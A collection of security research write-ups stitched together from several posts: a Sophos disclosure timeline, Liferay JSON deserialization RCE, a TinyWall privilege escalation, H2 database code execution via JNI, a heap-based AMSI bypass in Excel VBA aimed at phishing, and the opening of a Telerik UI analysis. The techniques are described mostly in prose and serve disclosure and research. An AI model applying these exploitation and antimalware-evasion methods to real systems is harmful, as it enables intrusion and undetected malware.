04.05.2020 - 22:48 UTC: Vulnerability reported to Sophos via BugCrowd.
04.05.2020 - 23:56 UTC: First reaction from Sophos confirming the report receipt.
05.05.2020 - 12:23 UTC: Message from Sophos that they were able to reproduce the issue and are working on a fix.
05.05.2020: Roll-out of a first automatic hotfix by Sophos.
16.05.2020 - 23:55 UTC: Reported a possible bypass of the added security measures in the hotfix.
21.05.2020: Second hotfix released by Sophos which disables the pre-auth email quarantine release feature.
June 2020: Release of firmware 18.0 MR1-1 which contains a built-in fix.
July 2020: Release of firmware 17.5 MR13 which contains a built-in fix.
13.07.2020: Release of the blog post in accordance with the vendor after ensuring that the majority of devices either received the hotfix or the new firmware version.
We highly appreciate the quick response times,
very friendly communication as well as the hotfix feature.
Code White has found multiple JSON deserialization vulnerabilities rated critical affecting Liferay Portal versions 6.1, 6.2, 7.0, 7.1, and 7.2. They allow unauthenticated remote code execution via the JSON web services API. Fixed Liferay Portal versions are 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2.
The JSONWebServiceActionParametersMap of Liferay Portal allows the instantiation of arbitrary classes and invocation of arbitrary setter methods.
Both allow the instantiation of an arbitrary class via its parameter-less constructor and the invocation of setter methods similar to the JavaBeans convention. This allows unauthenticated remote code execution via various publicly known gadgets.
Liferay Portal is one of the most popular, if not the most popular, portal implementations as per Java Portlet Specification JSR-168. It provides a comprehensive JSON web service API at '/api/jsonws' with examples for three different ways of invoking the web service method:
Via the generic URL /api/jsonws/invoke where the service method and its arguments get transmitted via POST, either as a JSON object or via form-based parameters (the JavaScript Example)
Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are passed via form-based POST parameters (the curl Example)
Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are also passed in the URL like /api/jsonws/service-class-name/service-method-name/arg1/val1/arg2/val2/… (the URL Example)
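For the generic variant, the request body is a JSON object whose key is the service method path and whose value holds the arguments; the method and argument names below are the same placeholders used above, not a real service.

```python
import json

# Generic /api/jsonws/invoke body: method path as key, arguments as value
invoke_body = json.dumps({
    "/service-class-name/service-method-name": {
        "arg1": "val1",
        "arg2": "val2",
    }
})
print(invoke_body)
```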
Authentication and authorization checks are implemented within the invoked service methods themselves while the processing of the request and thus the JSON deserialization happens before. However, the JSON web service API can also be configured to deny unauthenticated access.
First, we will take a quick look at LPS-88051, a vulnerability/insecure feature in the JSON deserializer itself. Then we will walk through LPS-97029 that also utilizes a feature of the JSON deserializer but is a vulnerability in Liferay Portal itself.
CST-7111: Flexjson's JSONDeserializer
In Liferay Portal 6.1 and 6.2, the Flexjson library is used for serializing and deserializing data. It supports object binding that will use setter methods of the objects instantiated for any class with a parameter-less constructor. The specification of the class is made with the class object key:
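A minimal document using this mechanism might look as follows; the target class and setter below are harmless placeholders, not a gadget.

```python
import json

# Flexjson-style object binding: the "class" key names the type to
# instantiate via its parameter-less constructor; remaining keys are
# mapped to setter calls (here a hypothetical setName).
doc = json.dumps({
    "class": "com.example.SomeBean",   # placeholder class name
    "name": "value passed to setName(...)",
})
print(doc)
```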
In Liferay Portal 7, the Flexjson library is replaced by the Jodd Json library that does not support specifying the class to deserialize within the JSON data itself. Instead, only the type of the root object can be specified and it has to be explicitly provided by a java.lang.Class object instance. When looking for the call hierarchy of write access to the rootType field, the following is revealed:
While most of the calls have hard-coded types specified, there is one that is variable (see selected call on the right above). Tracing that parameterType variable through the call hierarchy backwards shows that it originates from a ClassLoader.loadClass(String) call with a parameter value originating from a JSONWebServiceActionParameters instance. That object holds the parameters passed in the web service call. The JSONWebServiceActionParameters object has an instance of a JSONWebServiceActionParametersMap that has a _parameterTypes field for mapping parameters to types. That map is used to look up the class for deserialization during preparation of the parameters for invoking the web service method in JSONWebServiceActionImpl._prepareParameters(Class<?>).
Here the lines 102 to 110 are interesting: the typeName is taken from the key string passed in. So if a request parameter name contains a ':', the part after it specifies the parameter's type, i.e.:
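The effect can be mimicked with a few lines (a sketch of the observed parsing behavior, not Liferay's actual implementation; the class name is a placeholder):

```python
def split_param(key):
    # A ':' in the parameter name separates the name from the requested
    # parameter type, mirroring JSONWebServiceActionParametersMap.
    name, _, type_name = key.partition(":")
    return name, type_name or None
```

So a parameter named obj:com.example.SomeType would request com.example.SomeType as the deserialization type for obj.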
This vulnerability was reported in June 2019 and was fixed in 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2 by using a whitelist of allowed classes.
Demo
[1] There are two editions of the Liferay Portal: the Community Edition (CE) and the Enterprise Edition (EE). The CE is free and its source code is available at GitHub. Both editions have their own project and issue tracker at issues.liferay.com: CE has LPS-* and EE has LPE-*. LPS-88051 was created confidentially by Code White for CE and LPE-16598 was created publicly three days later for EE.
[2] Fixpacks are only available for the Enterprise Edition (EE) and not for the Community Edition (CE).
This blog post describes an interesting privilege escalation from a local user to SYSTEM for a well-known local firewall solution called TinyWall in versions prior to 2.1.13. Besides a .NET deserialization flaw through Named Pipe communication, an authentication bypass is explained as well.
Introduction
TinyWall is a local firewall written in .NET. It consists of a single executable that runs once as SYSTEM and once in the user context to configure it. The server listens on a Named Pipe for messages that are transmitted in the form of serialized object streams using the well-known and beloved BinaryFormatter. However, there is an additional authentication check that we found interesting to examine and that we want to elaborate here a little more closely as it may also be used by other products to protect themselves from unauthorized access.
For the sake of simplicity, the remaining article will use the terms Server for the receiving SYSTEM process and Client for the sending process within an authenticated user context, respectively. Keep in mind that the authenticated user does not need any special privileges (e.g. SeDebugPrivilege) to exploit the vulnerability described.
Named Pipe Communication
Many (security) products use Named Pipes for inter-process communication (e.g. see Anti Virus products). One of the advantages of Named Pipes is that a Server process has access to additional information on the sender like the origin Process ID, Security Context etc. through Windows' authentication model. Access to Named Pipes from a programmatic perspective is provided through Windows API calls but can also be achieved e.g. via direct filesystem access. The Named Pipe filesystem (NPFS) is accessible via the Named Pipe's name with the prefix \\.\pipe\.
The screenshot below confirms that a Named Pipe "TinyWallController" exists and could be accessed and written into by any authenticated user.
Talking to SYSTEM
First of all, let's look at how the Named Pipe is created and used. When TinyWall starts, a PipeServerWorker method takes care of a proper Named Pipe setup. For this the Windows API provides System.IO.Pipes.NamedPipeServerStream with one of its constructors taking a parameter of System.IO.Pipes.PipeSecurity. This allows for fine-grained access control via System.IO.PipeAccessRule objects using SecurityIdentifiers and alike. Well, as one can observe from the first screenshot above, the only restriction seems to be that the Client process has to be executed in an authenticated user context, which doesn't seem to be a hard restriction after all.
But as it turned out (again take a look at the screenshot above) an AuthAsServer() method is implemented to do some further checking. What we want is to reach the ReadMsg() call, responsible for deserializing the content from the message received.
If the check fails, an InvalidOperationException with "Client authentication failed" is thrown. Following the code brought us to an "authentication check" based on Process IDs, namely checking if the MainModule.FileName of the Server and Client process match. The idea behind this implementation seems to be that the same trusted TinyWall binary should be used to send and receive well-defined messages over the Named Pipe.
Since the test for equality using the MainModule.FileName property could automatically be passed when the original binary is used in a debugging context, let's verify the untrusted deserialization with a debugger first.
Testing the deserialization
Thus, to test if the deserialization with a malicious object would be possible at all, the following approach was taken. Starting (not attaching) the TinyWall binary out of a debugger (dnSpy in this case) would fulfill the requirement mentioned above such that setting a breakpoint right before the Client writes the message into the pipe would allow us to change the serialized object accordingly. The System.IO.PipeStream.writeCore() method in the Windows System.Core.dll is one candidate in the process flow where a breakpoint could be set for this kind of modification. Therefore, starting the TinyWall binary in a debugging session out of dnSpy and setting a breakpoint at this method immediately resulted in the breakpoint being hit.
Now, we created a malicious object with ysoserial.NET and James Forshaw's TypeConfuseDelegate gadget to pop a calc process. In the debugger, we use System.Convert.FromBase64String("...") as expression to replace the current value and also adjust the count accordingly.
Releasing the breakpoint resulted in a calc process running as SYSTEM. Since the deserialization took place before the explicit cast was triggered, it was already too late. If one doesn't like InvalidCastExceptions, the malicious object could also be put into a TinyWall PKSoft.Message object's Arguments member, an exercise left to the reader.
Faking the MainModule.FileName
After we have verified the deserialization flaw by debugging the client, let's see if we can get rid of the debugging requirement. So somehow the following restriction had to be bypassed:
The GetNamedPipeClientProcessId() method from Windows API retrieves the client process identifier for the specified Named Pipe. For a final proof-of-concept Exploit.exe our Client process somehow had to fake its MainModule.FileName property matching the TinyWall binary path. This property is retrieved from System.Diagnostics.ProcessModule's member System.Diagnostics.ModuleInfo.FileName which is set by a native call GetModuleFileNameEx() from psapi.dll. These calls are made in System.Diagnostics.NtProcessManager expressing the transition from .NET into the Windows Native API world. So we had to ask ourselves if it'd be possible to control this property.
As it turned out this property was retrieved from the Process
Environment Block (PEB) which is under full control of the process owner. The PEB by design is writeable from userland. Using NtQueryInformationProcess to get a handle on the process' PEB in the first place is therefore possible. The _PEB struct is built of several entries as e.g. PRTL_USER_PROCESS_PARAMETERS ProcessParameters and a double linked list PPEB_LDR_DATA Ldr. Both could be used to overwrite the relevant Unicode Strings in memory. The first structure could be used to fake the ImagePathName and CommandLine entries but more interesting for us was the double linked list containing the FullDllName and BaseDllName. These are exactly the PEB entries which are read by the Windows API call of TinyWall's MainModule.FileName code. There is also a nice Phrack article from 2007 explaining the underlying data structures in great detail.
Fortunately, Ruben Boonen (@FuzzySec) had already done some research on
these kinds of topics and released several PowerShell scripts. One of these
scripts is called Masquerade-PEB, which operates on the Process
Environment Block (PEB) of a running process to fake the attributes
mentioned above in memory. With a slight modification of this script (also left to the
reader) this enabled us to fake the MainModule.FileName.
Even though the PowerShell implementation could have been ported to C#, we chose the lazy path and imported the System.Management.Automation.dll into our C# Exploit.exe. Creating a PowerShell instance, reading in the modified Masquerade-PEB.ps1 and invoking the code hopefully would result in our faked PEB entries of our Exploit.exe.
Checking the result with a tool like Sysinternals Process Explorer confirmed our assumption such that the full exploit could be implemented now to pop some calc without any debugger.
Popping the calc
Implementing the full exploit now was straight-forward. Using our existing code of James Forshaw's TypeConfuseDelegate code combined with Ruben Boonen's PowerShell script being invoked at the very beginning of our Exploit.exe now was extended by connecting to the Named Pipe TinyWallController. The System.IO.Pipes.NamedPipeClientStream variable pipeClient was finally fed into a BinaryFormatter.Serialize() together with the gadget popping the calc.
Thanks to Ruben Boonen's work and support of my colleague Markus Wulftange the final exploit was implemented quickly.
Responsible disclosure
The vulnerability details were sent to the TinyWall developers on 2019-11-27 and fixed in version 2.1.13 (available since 2019-12-31).
Techniques to gain code execution in an H2 Database Engine are already well known but require H2 being able to compile Java code on the fly. This blog post will show a previously undisclosed way of exploiting H2 without the need of the Java compiler being available, a way that leads us through the native world just to return into the Java world using Java Native Interface (JNI).
But what if the Java compiler is not available? This was the exact case in a recent engagement where an H2 Database Engine instance version 1.2.141 on a Windows system was exposing its web console. We want to walk you through the journey of finding a new way to execute arbitrary Java code without the need of a Java compiler on the target server by utilizing native libraries (.dll or .so) and the Java Native Interface (JNI).
Assessing the Capabilities of H2
Let's assume the CREATE ALIAS … AS … command cannot be used as the Java compiler is not available. A reason for that may be that it's not a Java Development Kit (JDK) but only a Java Runtime Environment (JRE), which does not come with a compiler. Or the PATH environment variable is not properly set up so that the Java compiler javac cannot be found.
When referencing a method, the class must already be compiled and included in the classpath where the database is running. Only static Java methods are supported; both the class and the method must be public.
So every public static method can be used. But in the worst case, only h2-1.2.141.jar and a JRE are available. And additionally, only supported data types can be used for nested function calls. So, what is left?
While browsing the candidates in the Java runtime library rt.jar, the System.load(String) method stood out. It allows the loading of a native library. That would instantly allow code execution via the library's entry point function.
But how can the library be loaded to the H2 server? Although Java on Windows supports UNC paths and fetches the file, it refuses to actually load it. And this also won't work on Linux. So how can one write a file to the H2 server?
But while looking at the other supported options fieldSeparator, fieldDelimiter, escape, null, and lineSeparator, an idea came up: what if we blank them all out and use the CSV column header to write our data? And if the H2 database engine allows columns to have arbitrary names with arbitrary length, we would be able to write arbitrary data.
Quoted names are case sensitive, and can contain spaces. There is no maximum name length. Two double quotes can be used to create a single double quote inside an identifier.
That sounds almost perfect. So let's see if we can actually put anything in it and if CSVWRITE is binary-safe.
First, we generate our test data that covers all 8-bit octets:
$ python -c 'import sys;[sys.stdout.write(chr(i)) for i in range(0,256)]' > test.bin
$ sha1sum test.bin
4916d6bdb7f78e6803698cab32d1586ea457dfc8 test.bin
Now we generate a series of CHAR(n) function calls that will generate our binary data in the SQL query:
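The generator itself is only a few lines; here is a minimal Python sketch in the spirit of the one-liner above (the surrounding CSVWRITE statement that embeds this chain as a quoted column name is not shown and is an assumption based on the description):

```python
# Build a chain of CHAR(n) calls covering all 256 octets of test.bin.
# Concatenated with ||, this expression becomes the "column name" whose
# evaluation reproduces our binary data in the written file.
data = bytes(range(256))
char_chain = "||".join("CHAR(%d)" % b for b in data)
```
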
Finally, we test if the written file has the same checksum:
C:\Windows\Temp> certutil -hashfile test.bin SHA1
SHA1 hash of file test.bin:
49 16 d6 bd b7 f7 8e 68 03 69 8c ab 32 d1 58 6e a4 57 df c8
CertUtil: -hashfile command completed successfully.
So, the files seem to be identical!
Entering the Native World
Now that we can write a native library to disk using the built-in function CSVWRITE and load it by creating an alias for System.load(String), we could just use the library's entry point to achieve code execution.
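Expressed as SQL, the loading step could look like the following hypothetical statements (built here as Python strings; the alias name SYSTEM_LOAD and the DLL path are made-up placeholders, while the CREATE ALIAS ... FOR syntax follows the H2 documentation):

```python
# Hypothetical SQL: create an alias for the static method java.lang.System.load
# and call it with the path of the previously written native library.
create_alias = 'CREATE ALIAS SYSTEM_LOAD FOR "java.lang.System.load"'
load_library = "CALL SYSTEM_LOAD('C:\\Windows\\Temp\\evil.dll')"
```
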
But let's take it another step further. Let's see if there is a way to execute arbitrary commands/code from SQL: not just once when the native library gets loaded, but whenever we like, possibly even with feedback that we can see in the H2 Console.
This is where the Java Native Interface (JNI) comes in. It allows interaction between native code and the Java Virtual Machine (JVM). So in this case, it allows us to interact with the JVM in which the H2 Database is running.
The idea now is to use JNI to inject a custom Java class into the running JVM via ClassLoader.defineClass(byte[], int, int). That would allow us to create an alias and call it from SQL.
Calling into the JVM with JNI
First, we need to get a handle to the running JVM. This can be done with the JNI_GetCreatedJavaVMs function. Then we attach the current thread to the VM and obtain a JNI interface pointer (JNIEnv). With that pointer we can interact with the JVM and call JNI functions such as FindClass, GetStaticMethodID/GetMethodID and CallStatic<Type>Method/Call<Type>Method. The plan is to get the system class loader via ClassLoader.getSystemClassLoader() and call defineClass on it:
This basically mimics the Java expression ClassLoader.getSystemClassLoader().defineClass(classBytes, 0, classBytes.length). Note that plain Java code could not make this call directly since defineClass is protected, but JNI is not subject to these access control checks.
The custom Java class JNIScriptEngine has just one single public static method that evaluates the passed script using an available ScriptEngine instance:
Finally, putting everything together:
That way we can execute arbitrary JavaScript code from SQL.
This blog post describes how to bypass Microsoft's AMSI (Antimalware Scan Interface) in Excel using VBA (Visual Basic for Applications). In contrast to other bypasses, this approach does not use hardcoded offsets or opcodes but identifies crucial data on the heap and modifies it. The idea of a heap-based bypass has been mentioned by other researchers before, but at the time of writing this article no public PoC was available. This blog post will provide the reader with some insights into the AMSI implementation and a generic way to bypass it.
Introduction
Since Microsoft rolled out their AMSI implementation, many writeups about
bypassing the implemented mechanism have been released. Code White
regularly conducts Red Team scenarios where phishing plays a major role.
Phishing is often related to MS Office, specifically to malicious scripts
written in VBA. As per Microsoft, AMSI
also covers VBA code placed into MS Office documents. This fact
motivated some research performed earlier this year, evaluating
if and how AMSI can be defeated in an MS Office Excel environment.
In the past, several different approaches have been published to bypass AMSI. The following links contain information that served as inspiration or reference:
The first article from the list above also mentions a heap-based approach. Independently of that writeup, Code White's approach used exactly that idea. At the time of writing this article there was no code publicly available which implements this idea, which was another motivation to write this blog post. Porting the bypass to MS Excel/VBA revealed some nice challenges to be solved. The following chapters show the evolution of Code White's implementation in chronological order:
Implementing our own AMSI Client in C to have a debugging platform
Understanding how the AMSI API works
Bypassing AMSI in our own client
Porting this approach to VBA
Improving the bypass
Improving the bypass - making it production-ready
Implementing our own AMSI Client
In order to ease debugging, we will implement our own small AMSI client in C which triggers a scan on the malicious string ‘amsiutils’. This string gets flagged as evil since some AMSI bypasses of Matt Graeber used it. Scanning this simple string is an easy way to check if AMSI works at all and to verify that our bypass is functional. A ready-to-use AMSI client can be found on sinn3r's GitHub. This code provided us with a good starting point and also contained important hints, e.g. the pre-condition in the Local Group Policies.
We will implement our test client using Microsoft Visual Studio Community 2017. In a first step, we end up with two functions, amsiInit() and amsiScan(), not to be confused with functions exported by amsi.dll. Later we will add another function amsiByPass() which does what its name suggests. See this gist for the final code including the bypass.
Running the program generates the following output:
This means our ‘amsiutils’ is considered as evil. Now we can proceed working on our bypass.
Understanding AMSI Structures
As promised we would like to do a heap-based bypass. But why heap-based?
At first we have to understand that using the AMSI API requires initializing a so-called AMSI Context (HAMSICONTEXT). This context must be initialized using the function AmsiInitialize(). Whenever we want to scan something, e.g. by calling AmsiScanBuffer(), we have to pass our context as the first parameter. If the data behind this context is invalid, the related AMSI functions will fail. This is what we are after, but let's talk about that later.
Having a look at HAMSICONTEXT, we will see that the pre-processor resolves this type to a pointer type following the usual handle-declaration pattern, roughly typedef struct HAMSICONTEXT__ *HAMSICONTEXT.
So what we got here is a pointer to a struct called ‘HAMSICONTEXT__’. Let's have a look where this pointer points to by printing the memory address of ‘amsiContext’ in our client. This will allow us to inspect its contents using windbg:
The variable itself is located at address 0x16a144 (note that we have a 32-bit program here) and its content is 0x16c8b10; that's where it points to. At address 0x16c8b10 we see some memory starting with the ASCII characters ‘AMSI’, identifying a valid AMSI context. The output below the memory dump is derived via ‘!address’, which prints the memory layout of the current process.
There we can see that the address 0x16c8b10 is allocated to a region starting from 0x16c0000 to 0x16df0000 which is identified as Heap. Okay, that means AmsiInitialize() delivers us a pointer to a struct residing on the heap. A deeper look into AmsiInitialize() using IDA delivers some evidence for that:
The function allocates 16 bytes (10h) using the COM-specific API CoTaskMemAlloc(). The latter is intended to be an abstraction layer for the heap. See here and here for details. After allocating the buffer the Magic Word 0x49534D41 is written to the beginning of the block, which is nothing more than our ‘AMSI’ in ASCII.
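A quick sanity check confirms that this constant is just the four ASCII bytes in little-endian order:

```python
import struct

# 0x49534D41 written as a little-endian DWORD yields the tag bytes "AMSI"
magic = struct.pack("<I", 0x49534D41)
assert magic == b"AMSI"
```
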
It is worth noting that an application cannot easily change this behavior. The content of the AMSI context will always be stored on the heap unless really sneaky things are done, like copying the context somewhere else or implementing your own memory provider. This also explains why Microsoft states in their API documentation that the application is responsible for calling AmsiUninitialize() when it is done with AMSI: the client cannot (and should not) free that memory itself; the cleanup is performed by the AMSI library.
Now we have understood that
the AMSI Context is an important data structure
it is always placed on the heap
it always starts with the ASCII characters ‘AMSI’
In case our AMSI context is corrupt, functions like AmsiScanBuffer() will fail with a return value different from zero. But what does corrupt mean, and how does AmsiScanBuffer() detect whether the context is valid? Let's check that in IDA:
The function does what we already spoilered in the beginning: the first four bytes of the AMSI context are compared against the value 0x49534D41. If the comparison fails, the function returns 0x80070057, which does not equal 0 and tells us that something went wrong.
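Modeled in Python (a sketch of the decompiled logic, not the actual amsi.dll code), the check is simply:

```python
AMSI_MAGIC = 0x49534D41    # "AMSI" as a little-endian DWORD
E_INVALIDARG = 0x80070057  # HRESULT returned for a corrupt context

def amsi_scan_buffer(context_first_dword: int) -> int:
    """Return 0 (S_OK) only if the context still starts with the magic value."""
    if context_first_dword != AMSI_MAGIC:
        return E_INVALIDARG
    return 0  # the real function would go on to scan the buffer here
```
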
Bypassing AMSI in our own AMSI Client
Our heap-based approach relies on several assumptions to finally qualify as a bypass:
we already have code execution in the context of the AMSI client, e.g. by executing a VBA script
the AMSI client (e.g. Excel) initializes the AMSI context only once and reuses it for every AMSI operation
the AMSI client rates the checked payload as ‘not malicious’ in case AmsiScanBuffer() fails
The first point is not true for our test client, but that is also not required because it is only a test vehicle which we can modify as desired.
Especially the last point is important because we will try to mess up the one and only AMSI context available in the target process. If the failure of AmsiScanBuffer() leads to negative side effects (in the worst case the program might crash), the bypass will not work.
So our task is to iterate through the heap of the AMSI client process, look for chunks starting with ‘AMSI’ and mess this block up making all further AMSI operations fail.
Microsoft provides a nice code example which walks through the heap using a couple of functions from kernel32.dll.
Due to the fact that all the required information is present in user space one could do this task by parsing data structures in memory. Doing so would make the use of external functions obsolete but probably blow up our code so we decided to use the functions from the example above.
After cutting the example down to the minimum functionality we need, we end up with a function amsiByPass().
So this code retrieves the heap of the current process, iterates through it and looks at every chunk tagged as 'busy'. Within these busy chunks we check if the first bytes match our magic pattern ‘AMSI’ and if so overwrite it with some garbage.
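The effect of that loop can be illustrated with a small simulation in Python, standing in for the HeapWalk()-based C code (the bytearray plays the role of the process heap with its busy chunks):

```python
# Two fake "busy" chunks; the first one holds an AMSI context structure.
heap = bytearray(b"chunk-one...AMSI\x10\x00\x00\x00...chunk-two...")

pos = heap.find(b"AMSI")         # scan for the magic pattern
if pos != -1:
    heap[pos:pos + 4] = b"XXXX"  # overwrite the magic with garbage

# Every later AmsiScanBuffer() call on this context would now fail the check.
assert b"AMSI" not in heap
```
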
The expectation is now that our payload is no longer flagged as malicious but the AmsiScanBuffer() function should return with a failure. Let's check that:
Okay, that's exactly what we expected. Are we done? No, not yet as we promised to provide an AMSI bypass for EXCEL/VBA so let's move on..
Bypassing AMSI in Excel using VBA
Now we will dive into the strange world of VBA. We used Microsoft Excel for Office 365 MSO (16.0.11727.20222) 32-bit for our testing.
After having written a basic POC in C we have to port this POC to VBA. VBA supports importing arbitrary external functions from DLLs so using our Heap APIs should be no problem. As far as we understood VBA, it does not allow pointer arithmetic or direct memory access. This problem can be resolved by importing a function which allows copying data from arbitrary memory locations into VBA variables. A very common function to perform this task is RtlMoveMemory().
After some code fiddling we came up with the following code.
As you can see, we put some time measurement around the main loop. The loop may take several hundred thousand iterations, and combined with the poor VBA performance we expected the bypass to take a significant amount of time. Time is a crucial factor in a real attack scenario. If our phishing victim opens a malicious Excel sheet, it is not acceptable that the embedded script blocks execution for, let's say, more than one or two seconds. After about five seconds of perceived unresponsiveness of the application, a human will get impatient and do things like trying to close Excel, which is not what we want.
So let's see how long the bypass will take. To be honest, we did not expect what happened. The result was difficult to reproduce, and the measured runtime varied from 15 minutes to endless. In some rare cases, Excel was closed after some minutes without any further notice, probably because it was unresponsive for too long. However, this isn't really something we can use in a real scenario.
Okay, so what went wrong here? Is VBA really that slow? Yes, it is some orders of magnitude slower than our C code, but that does not explain what we experienced. Microsoft gives some internal details on how AMSI is implemented in Excel. It turns out that Excel uses a different strategy than e.g. PowerShell. The latter more or less sends the whole script to AmsiScanBuffer(). Excel implements a somewhat smarter approach based on so-called triggers. Microsoft considers pure VBA code to be harmless up to the point when imports come into play. That's exactly what we do: importing functions from external DLLs. Some of these imports are treated as potentially dangerous, and calls to them, including all parameters, are put into a ring buffer which is sent to AMSI. This gives AV solutions like MS Defender the opportunity to check the data behind addresses, which of course makes sense. Let's see what data is sent to the AMSI API in our specific case by breaking on AmsiScanBuffer using windbg:
As we can see, the ring buffer contains all functions we imported, including their parameter values. Our Windows 10 system has MS Defender installed and activated, so every call to AmsiScanBuffer() will bother our friend MS Defender. AMSI is implemented as in-process COM in the first place, but to finally communicate with other AV solutions it has to transport data out of process and perform a context switch. This can be seen in the following architecture overview provided by MS:
The little green block at the bottom of the figure shows that our process (Excel) indirectly communicates with Defender via RPC. Hmm... okay, so this is done several hundred thousand times, which is just too much and explains the long runtime. To provide some more evidence, we repeat the bypass with Defender switched off, which should significantly speed up our bypass. In addition, we monitor the number of calls to AmsiScanBuffer() so we can get an impression of how often it is called.
The same loop with Defender disabled took something between one and two minutes:
In a separate run we check the amount of calls to AmsiScanBuffer() using windbg:
AmsiScanBuffer() is called 124624 times (0x10000000 - 0xffe1930), which is roughly the number of iterations our loop did. That's a lot and underlines our assumption that AMSI is simply called very often. So we understood what is going on, but currently there seems to be no workaround available to solve our runtime problem.
Giving up now? Not yet...
Improving AMSI Bypass in Excel
As described in the chapter above our current approach is much too slow to be used in a real scenario. So what can we do to improve this situation?
One of the functions we imported is RtlMoveMemory(), which, as mentioned earlier, is used by a lot of malware. Monitoring this function makes a lot of sense, and it might be considered a trigger. Let's verify that by just removing the call to CopyMem (the alias for RtlMoveMemory) and seeing what happens. This prevents our bypass from working, but it might give us some insight.
The runtime is now at 0.8 seconds. Wow okay, this really made a change. It shall be noted that in this configuration we even walk through the whole heap. Due to the missing call to RtlMoveMemory() we will not find our pattern.
Having identified our bottleneck, what can we do? We have to find an alternative method to access raw memory which is not treated as a trigger by Excel. Some random googling revealed the function CryptBinaryToStringA(), which is part of crypt32.dll. The latter should be present on most Windows systems, so it should be safe to import it.
The function is intended to convert strings from one format to another, but it can also be used to simply copy bytes from an arbitrary memory position we specify. Cool, that's exactly what we are after! In order to abuse this function for our purpose, we call it to read the lpData field from the PROCESS_HEAP_ENTRY structure:
The input parameters, from left to right:
phe.lpData is the source we want to copy data from,
ByVal 4 is the length of bytes we want to copy (lpData is 32-bit on our 32-bit Excel)
ByVal 2 means we want to copy raw binary (CRYPT_STRING_BINARY)
ByVal VarPtr(magicWord) is the target we want to copy that memory to (our VBA variable magicWord)
the last parameter (ByVal VarPtr(bytesWritten)) tells us how many bytes were really copied
So let's replace all occurrences of RtlMoveMemory() with CryptBinaryToStringA() and check again how long our bypass takes. You can find an updated version of the source code right here.
Our loop now takes about four seconds to finish. That is still a lot, but it finished, and it told us that it found the pattern we are looking for. Let's see how many times Excel calls AmsiScanBuffer() with this version:
Oh my... Excel did not call AmsiScanBuffer() at all. So this means as long as there is no trigger in our code, nothing is sent to AMSI. Or the other way around: As soon as we use one single trigger function, Excel will send all calls to AMSI. Good to know...
This is the first time we can really verify if the bypass works. So let's look for some code which triggers AMSI from VBA. Iliya Dafchev shows some port of an older AMSI Bypass to VBA which gets flagged by AMSI itself in the first place. Perfect, we will put this code into a function called triggerAMSI() and use it as positive test:
After running it Excel complains as expected with a warning and just closes our current instance of Excel:
AMSI Alert by Excel - sorry for the German!
Putting our bypass and our positive test together we get the following function:
Hopes are high that the message box containing “we survived” gets displayed, because we killed AMSI before triggering it.
Great, our bypass seems to work. So let's put this into our real phishing campaign. Uhm... just wait, how long did the whole thing take? Four seconds? Repeated execution of the bypass even showed runtimes greater than ten seconds. Oh no, this is still too much.
Giving up now? Not yet...
Improving AMSI Bypass in Excel - continued
In the last chapter we improved our AMSI bypass from infinite runtime to ten seconds or below. This still seems to be too much for a real campaign (in our opinion). So what can we do to speed the whole thing up one more time?
The loop takes some 100k iterations, which would be done in C in no time. Defender is completely out of the game. So our current runtime seems to be purely a result of poor VBA performance. To be fair, the kind of thing we are currently doing is not a typical VBA task, so let's blame ourselves instead of Excel for doing crazy stuff...
Anyway, what can we do now? Programming C in VBA is not an option, but what about invoking some shellcode? As long as we can import arbitrary functions, the execution of shellcode should not be a problem. This code snippet shows an example of how to do that within VBA. The next step is converting our VBA code (or rather our initial C code) into assembly language, that is, into shellcode.
Everyone who has ever written a piece of shellcode and wanted to call functions from DLLs knows that the absolute addresses of these functions are not known at the time the shellcode gets assembled. This means we have to implement a mechanism like GetProcAddress() to look up the addresses of the required functions at runtime. How to do this without any library support is well understood and extensively documented, so we will not go into details here. Implementing this part of the shellcode is left as an exercise for the reader.
Of course there are many ready-to-use code snippets which should do the job, but we decided to implement the shellcode on our own. Why? Because it is fun, and self-written shellcode should be unlikely to get caught by AV solutions.
The main loop of our AMSI bypass in assembly can be found here.
The structure ShellCodeEnvironment holds some important information like the looked-up addresses of our HeapWalk() and GetProcessHeaps() functions. The rest of the loop should be straightforward...
So putting everything together we generate our shellcode, put it into our VBA code and start it from there as new thread. Of course we measure the runtime again:
This time it is only 0.02 seconds!
We think this result is more than acceptable. The runtime may vary depending on the processor load or the total heap size but it should be significantly below one second which was our initial goal.
Summary
We hope you enjoyed reading this blog post. We showed the feasibility of a heap-based AMSI bypass for VBA. The same approach, with slight adaptions, also works for PowerShell and .NET 4.8. The latter also comes with AMSI support integrated into its Common Language Runtime. As per Microsoft, AMSI is not a security boundary, so we do not expect much of a reaction, but we are still curious whether MS will develop detection mechanisms for this idea.
In 2017, several vulnerabilities were discovered in Telerik UI, a popular UI component library for .NET web applications. Although details and working exploits are public, it often proves to be a good idea to take a closer look at it. Because sometimes it allows you to explore new avenues of exploitation.
Introduction
Telerik UI for ASP.NET is a popular UI component library for ASP.NET web applications. In 2017, several vulnerabilities were discovered, potentially resulting in remote code execution:
A cryptographic weakness allows the disclosure of the encryption key (Telerik.Web.UI.DialogParametersEncryptionKey and/or the MachineKey) used to protect the DialogParameters via an oracle attack. It can be exploited to forge a functional file manager dialog and upload arbitrary files and/or compromise the ASP.NET ViewState in case of the latter.
A hard-coded default key is used to encrypt/decrypt the AsyncUploadConfiguration, which holds the path where uploaded files are stored temporarily. It can be exploited to upload files to arbitrary locations.
The name of the file stored in the location specified in AsyncUploadConfiguration is taken from the request and thus allows the upload of files with arbitrary extension.
The vulnerabilities were fixed in R2 2017 SP1 (2017.2.621) and R2 2017 SP2 (2017.2.711), respectively. As for CVE-2017-9248, there is an analysis by PatchAdvisor[1] that gives some insights and exploitation hints. And regarding CVE-2017-11317, the detailed writeup by @straight_blast seems to have been published even half a year before Telerik published an updated version. It describes in detail how the vulnerability was discovered and how it can be exploited to upload an arbitrary file to an arbitrary location. If you're unfamiliar with these vulnerabilities, you may want to read the linked advisories first to get a better understanding.
The Catch
Although the vulnerabilities sound promising, they all have their catch: exploiting CVE-2017-9248 requires many thousands of requests, which can be pretty noticeable and suspicious. And unless it is actually possible to leak the MachineKey (which would allow exploitation via deserialization of an arbitrary ObjectStateFormatter stream), a file upload to an arbitrary location (i.e., CVE-2017-11317) is still limited by the knowledge of an appropriate location with sufficient write permissions.
